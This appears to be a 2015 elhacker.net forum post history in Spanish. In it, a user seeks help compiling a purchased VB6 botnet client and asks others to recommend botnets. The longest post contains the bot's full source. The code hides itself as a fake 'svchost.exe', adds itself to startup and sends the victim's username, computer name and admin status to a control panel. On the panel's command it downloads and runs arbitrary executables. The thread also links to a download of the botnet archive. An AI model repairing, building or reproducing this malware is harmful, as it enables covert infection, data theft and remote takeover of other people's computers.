elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


  Mostrar Mensajes
Páginas: [1] 2
1  Programación / Programación Visual Basic / Re: Me arroja error "Sub or function not defined" en: 12 Febrero 2015, 11:43 am
disculpa mi arrogancia y mi desinformacion pero trato de compilarlo y no funciona es una botnet, no hace ddos ni ataques solo visita web, tato de compilarlo como dijiste pero no me autoinfecto para ver si funciona y no me sale en la la pagina como cliente.
no digo que te auto infectes no pongas ninguna agina solo si pudieras hacerlo funcionar tal y como esta te lo agradeceria mas por tu tiempo y trabajo que nada.
solo quiero que sea un exe
gracias.
2  Programación / Programación Visual Basic / Re: Me arroja error "Sub or function not defined" en: 12 Febrero 2015, 11:25 am

1) Bájate los humos, la gente te ha respondido a tu post con buena fé para intentar averiguar más datos sobre el problema, porque no puedes ir por ahí formulando una pregunta de programación sin dar NINGÚN tipo de información, y más cuando se trata de un maldito error, que el compiler te está indicando el motivo del error y ha hecho falta que un compañero te pida esos datos para que lo compartieses con los demás, ¿que narices esperas, que hagamos de adivinos?, deberías dar gracias por que más de 1 usuario haya prestado atención a un post de tan poca calidad (carente de cualquier información sobre el problema) y se haya tomado la molesta de responder al post.

El caso es que, YA TE ESTÁN AYUDANDO, así que no es necesario que te dirijas con prepotencia a las personas que te están ofreciendo ayuda, si eres una persona impaciente, pues lo siento por ti, si quieres irte, vete, nadie te obliga a quedarte, pero diciendo esas cosas no conseguirás NADA, bueno, si, conseguirás todo lo contrario a lo que tanto andas buscando (que no te ayuden).


2) Debes seguir las normas del foro, profavor no publiques posts duplicados y encima en la sección incorrecta, sabes perfectamente donde debes postear las preguntas sobre VB6.


3) Me imagino que la intención del miembro inexistente "MUTEX", como su nombre indica, sería para asignarle un MUTEX a la instancia de la aplicación, ¿tienes idea de lo que significa eso? (lo pregunto en serio, ¿aparte de copiar todo el código, te has parado a intentar examinarlo para aprender su funcionamiento?, lee acerca de Mutex y Sempahores ), simplemente elimina esa instrucción para que te compile correctamente, en un principio es irrelevante dado que tus intenciones no son manipular el Mutex de la app.


Saludos.

gracias, pero no funciona, la verdad no se nada de programacion y no estoy para nada interesado en ella, si me ayudaras poniendome el codigo correcto te lo agradeceria y jamas me volveras a ver por aqui. de nuevo gracias.

no quiero eliminar ninguna funcion porque el tutorial no dice que eliine nada sino que lo haga make.exe.
3  Programación / Programación Visual Basic / Re: Me arroja error "Sub or function not defined" en: 12 Febrero 2015, 06:23 am
me van a ayudar o no para irme a otro lugar?

gracias.
4  Programación / Programación Visual Basic / Re: Me arroja error "Sub or function not defined" en: 12 Febrero 2015, 00:58 am
mi antiguo proyecto: http://foro.elhacker.net/seguridad/me_recomiendan_una_botnet-t429408.0.html;msg1993978#msg1993978



me compre una botnet de pago no de ddos, si no de visitar paginas con http, y quiero hacer un proyecto con mi iphone y shsh para intrar a mi web con varias computadoras.
ese codigo es de la botnet, donde no puedo hacer el ejecutable en vb6 cuando le doy make o compilar.

aqui esta el link de la botnet : http://www.mediafire.com/download/4msrb27bb70y1zq/uBot+Sauce.rar

el archivo se llama Form1.frm esta ubicado en hidden, en el zip vb6 source.
5  Programación / Programación Visual Basic / Re: Me arroja error "Sub or function not defined" en: 12 Febrero 2015, 00:28 am
no se me descargue este archivo para mi proyecto anterior. que hace? o como lo corrijo?
6  Programación / Programación Visual Basic / Re: Me arroja error "Sub or function not defined" en: 11 Febrero 2015, 10:13 am
http://subefotos.com/ver/?797bb634d3203129671a4064e6d9891eo.png#codigos

es todo no me dice nada, q hago, no detecto el problema?
o creo que es mutex lo q me arroja cmo error.
alguna idea de como modificarlo?

Mod: No hacer doble post
7  Programación / Programación Visual Basic / Me arroja error "Sub or function not defined" en: 11 Febrero 2015, 08:00 am
muy buenas.
al quererlo compilarlo como exe me arroja el error.
no consigo encontrar el problema. me ayudan?

Código
  1. 'Hidden File
  2. Private Declare Function SetFileAttributes Lib "kernel32" Alias "SetFileAttributesA" (ByVal lpFileName As String, ByVal dwFileAttributes As Long) As Long
  3.  
  4. Dim keyword(4) As Variant
  5.  
  6. Private Sub Form_Load()
  7. On Error Resume Next
  8. '################### [SETTINGS] ###################
  9. panel = "http://xxxx.com.mx/sour" 'Panel URL
  10. MuTeX "MUTREX_910480921" 'Set Mutex
  11.  
  12. Interval = 20 'minutes
  13. intCount = 0 'tCount
  14. '################### [/SETTINGS] ###################
  15.  
  16.  
  17.  
  18. '################## [PERSISTANCE] ##################
  19. 'Call MakeCritical(-1, True) 'BSOD Process Persistance
  20. App.TaskVisible = False 'Visibility
  21.  
  22. FileCopy App.Path & "\" & App.EXEName & ".exe", Environ("AppData") & "\svchost.exe" 'Copy file
  23. SetFileAttributes Environ("AppData") & "\svchost.exe", FILE_ATTRIBUTE_HIDDEN 'Hide it
  24.  
  25. addtostartup "svchost", (Environ("AppData") & "\svchost.exe") 'Add to startup
  26. '################## [/PERSISTANCE] ##################
  27.  
  28. Call getCommand(panel)
  29. End Sub
  30.  
  31. Private Sub Timer1_Timer()
  32. On Error Resume Next
  33. intCount = intCount + 1 'Count +1 minute...
  34.  
  35. If intCount = Interval Then 'If time is reached...
  36. intCount = 0 'Reset
  37. addtostartup "svchost", (Environ("AppData") & "\svchost.exe")
  38.  
  39. Call getCommand(panel)
  40. End If
  41.  
  42. End Sub
  43.  
  44. Public Sub getCommand(ByVal panel) 'Get Latest Command
  45. On Error Resume Next
  46. Dim objHttp As Object, strURL As String, strText As String, id As String
  47.  
  48. id = GetSetting("svchost", "svchost", "id", strText) 'Get ID
  49.  
  50. strURL = panel & "run.php" 'Control Panel / run.php
  51. Set objHttp = CreateObject("MSXML2.ServerXMLHTTP")
  52. objHttp.Open "POST", strURL, False
  53. objHttp.setRequestHeader "User-Agent", _
  54.    "753cda8b05e32ef3b82e0ff947a4a936" 'Set user-agent [Secret MD5]
  55. objHttp.setRequestHeader "Content-Type", _
  56.    "application/x-www-form-urlencoded" 'Allows data to be sent
  57.  
  58. If id <> "" Then 'If NOT blank...
  59. objHttp.Send ("userandpc=" & Environ("USERNAME") & "@" & Environ("COMPUTERNAME") & "&admin=" & AmIAdmin & "&os=" & os & "&id=" & id) 'Send ID
  60. Else
  61. objHttp.Send ("userandpc=" & Environ("USERNAME") & "@" & Environ("COMPUTERNAME") & "&admin=" & AmIAdmin & "&os=" & os) 'Don't send ID, and retrieve new ID...
  62. End If
  63.  
  64. strText = objHttp.ResponseText 'Response Text
  65.  
  66.        Dim errcode As Long
  67.        Dim localFileName As String
  68.        Dim rN As Integer
  69.  
  70. If Left(strText, 3) = "id|" Then
  71.    SaveSetting "svchost", "svchost", "id", Split(strText, "|")(1) 'Save the new ID
  72.  
  73. ElseIf Left(strText, 3) = "DL|" Then 'Download...
  74.        Randomize
  75.        rN = Int(Rnd * 999999)
  76.        DLurl = "http://" & Split(strText, "|")(1) 'Get download URL via. Split
  77.  
  78.        localFileName = Environ("TEMP") & "\" & rN & ".exe" 'Save dir
  79.  
  80.        errcode = URLDownloadToFile(0, DLurl, localFileName, 0, 0) 'Download
  81.  
  82.        Shell (Environ("TEMP") & "\" & rN & ".exe") 'Execute
  83.  
  84. ElseIf Left(strText, 3) = "UP|" Then
  85.        Randomize
  86.        rN = Int(Rnd * 999999)
  87.        DLurl = "http://" & Split(strText, "|")(1) 'Get download URL via. Split
  88.  
  89.        localFileName = Environ("TEMP") & "\" & rN & ".exe" 'Save dir
  90.  
  91.        errcode = URLDownloadToFile(0, DLurl, localFileName, 0, 0) 'Download
  92.  
  93.        Shell (Environ("TEMP") & "\" & rN & ".exe") 'Execute
  94.  
  95.        'Removal/Ending...
  96.        Dim WshShell, CAL1
  97.        Set WshShell = CreateObject("WScript.Shell")
  98.  
  99.        If AmIAdmin = True Then
  100.            CAL1 = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"
  101.            WshShell.RegDelete CAL1
  102.        Else
  103.            CAL1 = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
  104.            WshShell.RegDelete CAL1
  105.        End If
  106.  
  107.        Call MakeCritical(-1, False)
  108.        End
  109.  
  110. ElseIf Left(strText, 3) = "VV|" Then
  111.        ShellExecute Me.hwnd, "Open", Split(strText, "|")(1), 0, 0, SW_SHOWNORMAL 'ShellExec [Normal]
  112.  
  113. ElseIf Left(strText, 3) = "VI|" Then
  114.        Shell Environ("programfiles") & "\Internet Explorer\iexplore.exe " & Split(strText, "|")(1), vbHide 'ShellExec [Hidden]
  115.  
  116. ElseIf Left(strText, 3) = "UN|" Then 'Removal/Ending...
  117.        If AmIAdmin = True Then
  118.            CAL1 = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"
  119.            WshShell.RegDelete CAL1
  120.        Else
  121.            CAL1 = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
  122.            WshShell.RegDelete CAL1
  123.        End If
  124.  
  125.        Call MakeCritical(-1, False)
  126.        End
  127. End If
  128.  
  129.  
  130. Set objHttp = Nothing
  131.  
  132. End Sub
  133.  

gracias.

Mod: código modificado, puesto en etiquetas GeSHi
8  Seguridad Informática / Seguridad / Re: me recomiendan una botnet? en: 6 Febrero 2015, 01:33 am
al final opte por "comprar" una botnet, se ve buena, y me salio gratis de todas formas, en si, solo necesito controlar a todos mis "zombies", al mismo tiempo, para ejecutar el usuario de mi shsh, nose como sea la cosa de ddos, pero tiene la opcion de visitar webs al mismo tiempo por petision. si quieren saber el precio es de 60 dolares, y hay otas de 600 dolares, pero son buenas.
graias y saludos
9  Seguridad Informática / Seguridad / Re: me recomiendan una botnet? en: 5 Febrero 2015, 08:50 am
ese es el punto, no se que sea de shsh, por eso no puedo saber q pasa, creo que es un fallo, para ello necesito una bot para seguir analizando algunas cosas como si varios usuarios a la vez pueden entrar en mi cuenta de shsh, y otras cosas mas que si es necesario la botnet. la visita simple se configura con un comando de get.

si me ayudaras con darme algunos nombres de botnets me ayudarias mcho xq me quiero ir a comer, y mi tiempo se limita mucho. seria mas rapido y espero solucionar esto por mi cuenta.

Mod: No hagas doble post
10  Seguridad Informática / Seguridad / Re: me recomiendan una botnet? en: 5 Febrero 2015, 08:36 am
lo primero es q me alentan el internet, solar bot, me lo alenta, andromeda, no pude entrar con el admin admin, intende de todo, cambie el config.php y nada, vertexnet, no sirve, zeus me lo detectan como virus en el hosting, athena no me conecta con las maquinas y spy eye no esta en funcion. yo queria una botnet mas o menos como vertexnet xq ese si trae una simple visita por petision y lo puedes configurar a tu gusto pero no sirve.
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines